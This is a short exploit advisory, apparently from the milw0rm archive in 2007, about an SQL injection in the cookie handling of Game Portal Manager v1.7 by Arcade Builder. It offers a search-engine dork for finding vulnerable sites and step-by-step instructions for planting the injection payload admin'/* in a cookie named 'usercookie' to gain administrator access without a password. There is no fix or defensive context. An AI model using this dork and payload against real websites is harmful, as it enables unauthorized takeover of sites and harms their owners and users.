--==+================================================================================+==-- --==+ Game Portal Manager v1.7 SQL Injection Vulnerability +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SITE: http://www.arcadebuilder.net/ DORK: intext:"Powered by Arcade Builder" DESCRIPTION: The browser cookie is sql injectable, allowing admin access without knowing the password. EXPLOIT: Using your prefered cookie editor make a cookie with the following; Name: usercookie Content: admin'/* Host: www.somesite.com Path: / GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net ! --==+================================================================================+==-- --==+ Game Portal Manager v1.7 SQL Injection Vulnerability +==-- --==+================================================================================+==-- # milw0rm.com [2007-07-01]